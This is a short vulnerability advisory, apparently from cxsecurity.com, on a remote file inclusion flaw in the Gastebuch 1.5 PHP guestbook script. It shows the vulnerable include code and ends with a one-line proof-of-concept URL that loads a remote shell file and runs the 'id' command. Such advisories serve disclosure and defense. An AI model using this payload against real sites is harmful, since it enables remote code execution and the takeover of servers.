Gastebuch Version 1.5 Remote Command Execution Vulnerability

2007.08.14
Credit: Rizgar
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Gstebuch Version 1.5 Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : Gstebuch Version Version : 1.5 Site : http://www.mapos-scripts.de/downloads.php?download=11 Founder : Rizgar Contact : rizgar (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :] ----------------------------------------------------------------------- <?php session_start(); include($config["root_ordner"].'config.php'); if (file_exists($root_ordner.'install.php')) { echo "<meta http-equiv='refresh' content='0;URL=install.php'>"; exit; } include($config["root_ordner"].'includes/dbconnect.php'); include($config["root_ordner"].'includes/function.php'); include($config["root_ordner"].'includes/captcha.php'); $header = style('index_body','header'); echo $header; ... ?> PoC : http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt? &cmd=id


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top